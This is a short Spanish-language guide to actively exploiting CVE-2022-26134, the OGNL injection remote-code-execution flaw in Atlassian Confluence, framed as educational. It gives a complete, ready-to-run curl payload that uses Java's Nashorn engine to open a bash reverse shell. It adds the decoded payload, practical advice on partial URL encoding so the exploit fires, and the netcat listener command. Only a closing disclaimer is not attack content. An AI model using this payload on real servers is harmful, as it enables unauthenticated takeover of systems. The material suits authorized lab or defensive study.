
Explotación activa de la aplicación Questions for Confluence de Atlassian CVE-2022-26134
CVE-2022-26134 es una vulnerabilidad crítica de Ejecución Remota de Código (RCE) que afecta a Atlassian Confluence. Esta vulnerabilidad permite a atacantes no autenticados ejecutar código arbitrario mediante la inyección de expresiones OGNL en endpoints vulnerables.
El siguiente comando CURL demuestra la explotación activa de esta vulnerabilidad, utilizando el motor Nashorn de Java para ejecutar una shell reversa:
curl -v http://10.0.0.28:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/10.0.0.28/1270%200%3E%261%27%29.start%28%29%22%29%7D/
Al realizar estas modificaciones, también debemos tener en cuenta la codificación de la URL. La cadena de payload en la prueba de concepto no está completamente codificada en URL. Ciertos caracteres (notablemente ".", "-" y "/") no están codificados. Aunque no siempre es el caso, para este exploit esto resulta importante para el funcionamiento del payload. Si alguno de estos caracteres se codifica, el servidor analizará la URL de manera diferente y el payload puede no ejecutarse. Esto significa que no podemos aplicar codificación URL en todo el payload una vez que lo hemos modificado.
${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval(...)}
new java.lang.ProcessBuilder().command('bash','-c','bash -i > /dev/tcp/10.0.0.28/1270 0>&1').start()
nc -lvnp 1270
Esta documentación es solo con fines educativos. La explotación no autorizada de sistemas es ilegal y puede resultar en consecuencias graves. Obtenga siempre la autorización adecuada antes de realizar evaluaciones de seguridad.